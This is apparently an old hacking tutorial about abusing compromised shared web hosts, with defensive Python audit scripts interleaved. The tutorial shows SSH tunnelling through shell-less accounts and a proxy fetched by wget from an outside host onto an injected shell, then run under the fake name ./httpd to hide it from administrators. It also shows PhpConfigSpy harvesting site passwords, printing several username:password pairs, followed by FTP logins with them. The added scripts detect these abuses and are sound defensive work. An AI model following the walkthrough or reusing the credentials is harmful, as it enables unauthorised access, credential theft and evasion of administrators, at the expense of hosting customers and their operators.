This may answer the many questions about how to tunnel over SSH when no SSH shell can be started. There is no problem when shell access is enabled: you can set up the tunnel in the usual way. In this case you have a target IP that accepts connections on port 22, which means you can use it for tunneling (you must know the username and password, of course) even though the shell cannot be started.
You can scan the target with PhpConfigSpy to grab a login password.
Let's start the lesson.
I found a target and scanned it; luckily, I got a username and password.
alvoacusxxx.pt
[FTP] elaboran:sggvhbui7 Success
If you log in to that target with this username and password, you will be greeted like this:
login as: elaboran
elaboran@alvoacusxxx.pt's password:
Last login: Fri May 15 02:43:04 2009 from 41.233.169.205
Shell access is not enabled on your account!
If you need shell access please contact support.
Don't worry, you can still use that target for tunneling. The procedure is the same as for a normal SSH tunnel; you just add a little configuration in PuTTY.
In the Category tree on the left side of PuTTY, expand the entries until you find SSH. Select it and, on the right side, tick "Don't start a shell or command at all" and "Enable compression" (in OpenSSH these are the -N and -C options).
That's it; log in with the username and password. Be aware that a successful login shows nothing on screen: the PuTTY window just sits below the password prompt, but the tunnel is working. This works because port forwarding is handled by sshd itself; the login shell is only executed for an interactive session, so a shell that prints "Shell access is not enabled" and exits does not stop forwarding. Only AllowTcpForwarding no in sshd_config (for example in a Match block covering such accounts) does.
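The check an administrator of such a host would want, as an added example (not code from the original post, from PuTTY or from OpenSSH): given an sshd_config and /etc/passwd, list the accounts whose login shell refuses interactive sessions but which can still open port forwards. It models the OpenSSH rules that the first value of a keyword wins, that a satisfied Match block overrides the global value, and that AllowTcpForwarding defaults to yes; only Match User and Match Group criteria are understood, group membership must be passed in by the caller, and the cPanel "noshell" path, the sshd_config texts and the passwd lines are constructed samples.

```python
"""Accounts with no usable login shell that can still tunnel through sshd.

Added example, not code from the original post, PuTTY or OpenSSH. It models
the OpenSSH rules that the first value of a keyword wins, that a satisfied
Match block overrides the global value, and that AllowTcpForwarding
defaults to "yes". Only "Match User ..." / "Match Group ..." criteria are
handled (a simplification) and group membership is supplied by the caller.
"""
import shlex

# Login shells that refuse interactive sessions; the cPanel path is an assumption.
NO_SHELL = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
            "/usr/local/cpanel/bin/noshell"}


def parse_sshd_config(text):
    """Return (global_directives, match_blocks).

    global_directives maps lower-cased keyword -> first value seen.
    match_blocks is a list of (criteria, directives) in file order, where
    criteria maps "user"/"group" -> set of names ("Match all" gives {}).
    """
    global_directives, match_blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        keyword, args = parts[0].lower(), parts[1:]
        if keyword == "match":
            criteria = {}
            if [a.lower() for a in args] != ["all"]:
                for name, values in zip(args[0::2], args[1::2]):
                    criteria[name.lower()] = set(values.split(","))
            current = {}
            match_blocks.append((criteria, current))
            continue
        target = global_directives if current is None else current
        target.setdefault(keyword, " ".join(args))  # first obtained value wins
    return global_directives, match_blocks


def _satisfied(criteria, user, groups):
    if "user" in criteria and user not in criteria["user"]:
        return False
    if "group" in criteria and not criteria["group"].intersection(groups):
        return False
    return True


def forwarding_allowed(config_text, user, groups=()):
    """Effective AllowTcpForwarding for user; anything but "no" leaves forwarding open."""
    global_directives, match_blocks = parse_sshd_config(config_text)
    value = global_directives.get("allowtcpforwarding", "yes")
    for criteria, directives in match_blocks:
        if _satisfied(criteria, user, groups) and "allowtcpforwarding" in directives:
            value = directives["allowtcpforwarding"]
            break  # first satisfied Match block that sets the keyword wins
    return value.lower() != "no"


def audit(config_text, passwd_text):
    """Accounts whose shell blocks logins but which may still tunnel through sshd."""
    exposed = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        user, shell = fields[0], fields[6]
        if shell in NO_SHELL and forwarding_allowed(config_text, user):
            exposed.append(user)
    return exposed


# Constructed samples; only one account has been fenced off with a Match block.
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
Match User elaboran
    AllowTcpForwarding no
    PermitTTY no
"""

# Constructed fix: deny forwarding by default, re-enable it only for a dedicated group.
HARDENED_SSHD_CONFIG = """\
AllowTcpForwarding no
PermitTunnel no
Match Group sshtunnel
    AllowTcpForwarding local
"""

# Constructed /etc/passwd lines (uids other than bsidenet's are invented).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
elaboran:x:32140:32140::/home/elaboran:/usr/local/cpanel/bin/noshell
bsidenet:x:32137:32137::/home/bsidenet:/usr/local/cpanel/bin/noshell
gratis:x:32138:32138::/home/gratis:/bin/false
"""

if __name__ == "__main__":
    print("still able to tunnel:", audit(SAMPLE_SSHD_CONFIG, SAMPLE_PASSWD))
    print("after hardening:", audit(HARDENED_SSHD_CONFIG, SAMPLE_PASSWD))
```

With the first config only elaboran is blocked, so bsidenet and gratis are reported; with the hardened one nobody is, and a member of the sshtunnel group keeps local forwarding.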
Do you have an SSH shell, or a shell on a target obtained through injection, and don't know what to use it for?
I will show you how to build a proxy on that SSH host. First, download the proxy.tgz archive.
If you are working from an injected shell, you must find a directory with permission 777 (drwxrwxrwx) using the command "find / -type d -perm 777" (-perm 777 matches only that exact mode).
Follow the step-by-step proxy build below:
[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
--01:30:35-- http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com... 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz'
100%[=======================================>] 54,004 --.-K/s in 0.04s
01:30:35 (1.21 MB/s) - `proxy.tgz' saved [54004/54004]
[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox
[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr--r-- 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132
The proxy is now running and ready to use: point your client at the IP of the SSH host and port 2020.
The proxy runs under the fake name ./httpd to mislead the real administrator. Note that this only changes the name shown by ps; the listening port is still visible, and /proc/20132/exe still points to the real binary.
To stop the proxy, kill it by its PID (20132) with the command "kill -9 20132".
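The other side of the fake-name trick, as an added example (not code from the original post and not part of the xh or prox tools it shows): a scan of /proc that flags processes whose advertised name does not match the binary they run. A launcher that renames a process, as "xh -s ./httpd" is shown doing, can only change what the process reports about itself (argv[0] in /proc/<pid>/cmdline and, with prctl(PR_SET_NAME), the short name in /proc/<pid>/comm); the kernel still exposes the real executable through the /proc/<pid>/exe symlink, so the scan compares the three and also flags binaries living under directories anyone can write to. The /proc look-alike built by demo(), the drop-directory list and the pids other than 20132 are constructed.

```python
"""Spot processes whose advertised name does not match the binary they run.

Added example, not code from the original post and not part of xh or prox.
argv[0] (cmdline) and comm are under the process's control; the exe symlink
is not. Run as root on a live host, otherwise /proc/<pid>/exe is only
readable for your own processes.
"""
import os
import tempfile

# Assumption: typical world-writable drop directories on a shared host.
WORLD_WRITABLE_PARENTS = ("/tmp", "/var/tmp", "/dev/shm")


def _read(path, binary=False):
    try:
        with open(path, "rb" if binary else "r") as f:
            return f.read()
    except OSError:
        return b"" if binary else ""


def _argv(pid_dir):
    """argv from /proc/<pid>/cmdline (NUL-separated); [] for kernel threads."""
    raw = _read(os.path.join(pid_dir, "cmdline"), binary=True)
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def find_spoofed(proc_root="/proc"):
    """Return [(pid, argv0, exe, reasons)] for processes that look renamed."""
    findings = []
    pids = sorted(int(e) for e in os.listdir(proc_root) if e.isdigit())
    for pid in pids:
        pid_dir = os.path.join(proc_root, str(pid))
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue  # kernel thread, or another user's process when not root
        if exe.endswith(" (deleted)"):  # binary removed after launch; still comparable
            exe = exe[: -len(" (deleted)")]
        argv = _argv(pid_dir)
        if not argv:
            continue
        real = os.path.basename(exe)
        # Login shells are started as "-bash"; drop that convention before comparing.
        shown = os.path.basename(argv[0]).lstrip("-")
        comm = _read(os.path.join(pid_dir, "comm")).strip()
        reasons = []
        if shown != real:
            reasons.append("argv[0] %r but exe is %r" % (argv[0], exe))
        if comm and comm != real[:15]:  # the kernel truncates comm to 15 bytes
            reasons.append("comm %r but exe is %r" % (comm, exe))
        if any(exe.startswith(d + "/") for d in WORLD_WRITABLE_PARENTS):
            reasons.append("exe lives under a world-writable directory")
        if reasons:
            findings.append((pid, argv[0], exe, reasons))
    return findings


def _fake_proc(root, pid, exe, argv, comm):
    """Write a constructed /proc/<pid> entry: cmdline, comm and the exe symlink."""
    pid_dir = os.path.join(root, str(pid))
    os.mkdir(pid_dir)
    with open(os.path.join(pid_dir, "cmdline"), "wb") as f:
        f.write(b"\0".join(a.encode() for a in argv) + b"\0")
    with open(os.path.join(pid_dir, "comm"), "w") as f:
        f.write(comm + "\n")
    os.symlink(exe, os.path.join(pid_dir, "exe"))  # readlink works even if target is absent


def demo():
    """Scan a constructed tree: an honest daemon, a login shell and the renamed proxy."""
    with tempfile.TemporaryDirectory() as root:
        _fake_proc(root, 612, "/usr/sbin/sshd", ["/usr/sbin/sshd"], "sshd")
        _fake_proc(root, 4410, "/bin/bash", ["-bash"], "bash")
        # Modelled on the page: "./xh -s ./httpd ./prox -a -d -p2020" -> PidNum 20132
        _fake_proc(root, 20132, "/tmp/pro/prox", ["./httpd", "-a", "-d", "-p2020"], "prox")
        return find_spoofed(root)


if __name__ == "__main__":
    for pid, argv0, exe, reasons in find_spoofed():
        print(pid, argv0, "->", exe, "|", "; ".join(reasons))
```

On the constructed tree only pid 20132 is reported, for two reasons: argv[0] ./httpd against exe /tmp/pro/prox, and a binary under /tmp. Interpreters started as "python3" while exe is "python3.11" will also show up; treat the argv[0] mismatch as a lead to confirm with the exe path and the listening port, not as proof.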
PhpConfigSpy is a great tool for harvesting accounts from a web host: cPanel logins, SSH logins (if the target supports SSH), and sometimes database logins.
Most of us, after getting a web target (via PHP injection), use it only for bots (Eggdrop, psyBNC). Why not try to get full access to the web target instead?
Let's try to pull login information from the web target with PhpConfigSpy.
Upload PhpConfigSpy.txt to the web target, then rename the file from .txt to .php. That's all. You can run the tool from a browser (IE, Firefox, Opera, etc.), for example http://www.yourtarget.com/portal/images/phpconfigspy.php.
This is the result of the scan:
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…
[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success
Bingo, success! The scan only works because the PHP script runs as a user that can traverse and read the other accounts' public_html directories, normally the shared web-server account; the directory listing below shows public_html with mode drwxr-x--- and group 99, the nobody group Apache runs as on CentOS-style hosts, which is exactly that.
You can check the credentials via FTP or SSH (if the target supports SSH).
Let's check this login together:
[FTP] bsidenet:bside123 Success
That means user bsidenet, password bside123.
C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r--r-- 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r--r-- 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r--r-- 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r--r-- 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx------ 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw------- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x--- 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x--- 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>
It works, bro!
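The check a shared-hosting administrator would want against what PhpConfigSpy did above, as an added example (not code from the original post and not PhpConfigSpy itself): walk the home directories and report every account's config file that a chosen (uid, gids) pair could read, evaluating the permission bits along each path instead of calling access(), so the auditor can ask "what can the web-server user see?" without being that user. The tree built by demo() is constructed and modelled on the FTP listing above (home 711, public_html 750 with the web-server group, configuration.php 644); the config file names, the other two accounts' modes and the "nobody" lookup in the main block are assumptions.

```python
"""Per-account web config files that another local user could read.

Added example, not code from the original post and not PhpConfigSpy.
The permission check mirrors the classic Unix rule (owner bits if you own
the object, else group bits if you are in its group, else other bits),
applied to every directory on the path and then to the file itself.
"""
import os
import stat
import tempfile

# Assumption: config files the usual PHP applications keep credentials in.
CONFIG_NAMES = {"config.php", "configuration.php", "wp-config.php"}


def _has(st, uid, gids, owner_bit, group_bit, other_bit):
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & owner_bit)
    if st.st_gid in gids:
        return bool(st.st_mode & group_bit)
    return bool(st.st_mode & other_bit)


def readable_by(root, rel, uid, gids):
    """Can (uid, gids) traverse each directory from root to rel and then read rel?"""
    current = root
    for part in rel.split(os.sep)[:-1]:
        current = os.path.join(current, part)
        if not _has(os.stat(current), uid, gids, stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH):
            return False
    return _has(os.stat(os.path.join(root, rel)), uid, gids, stat.S_IRUSR, stat.S_IRGRP, stat.S_IROTH)


def exposed_configs(home_root, uid, gids):
    """Config files under home_root that (uid, gids) can read but does not own."""
    hits = []
    for dirpath, _dirs, files in os.walk(home_root):
        for name in files:
            if name not in CONFIG_NAMES:
                continue
            full = os.path.join(dirpath, name)
            if os.stat(full).st_uid == uid:
                continue  # reading your own config is not the problem
            rel = os.path.relpath(full, home_root)
            if readable_by(home_root, rel, uid, gids):
                hits.append(rel)
    return sorted(hits)


def _account(root, user, home_mode, html_mode, cfg_mode):
    """Constructed cPanel-style account: home/public_html/configuration.php."""
    home = os.path.join(root, user)
    html = os.path.join(home, "public_html")
    os.makedirs(html)
    cfg = os.path.join(html, "configuration.php")
    with open(cfg, "w") as f:
        f.write("<?php $password = 'constructed-sample';\n")
    os.chmod(cfg, cfg_mode)
    os.chmod(html, html_mode)
    os.chmod(home, home_mode)


def demo():
    """Returns (configs the web-server user can read, configs any local user can read)."""
    web_uid = os.getuid() + 1  # constructed: a uid that owns none of the files
    web_gid = os.getgid()      # constructed stand-in for the gid 99 on public_html
    with tempfile.TemporaryDirectory() as root:
        _account(root, "bsidenet", 0o711, 0o750, 0o644)  # modes as in the listing
        _account(root, "cofinca", 0o711, 0o755, 0o644)   # world-readable (assumed)
        _account(root, "gratis", 0o711, 0o700, 0o600)    # hardened (assumed)
        as_web_user = exposed_configs(root, web_uid, {web_gid})
        as_stranger = exposed_configs(root, web_uid, set())
    return as_web_user, as_stranger


if __name__ == "__main__":
    import pwd
    nobody = pwd.getpwnam("nobody")  # assumption: the account Apache runs as
    for rel in exposed_configs("/home", nobody.pw_uid, {nobody.pw_gid}):
        print("readable by nobody:", rel)
```

Modelled on the listing, bsidenet's configuration.php is readable by the web-server user because that user is in public_html's group, and cofinca's by anyone on the box; gratis's 700 public_html keeps both out. The durable fix is to stop sharing one web-server user across accounts (suPHP, per-account php-fpm pools or equivalent) so that the group bit on public_html no longer opens every account to every script.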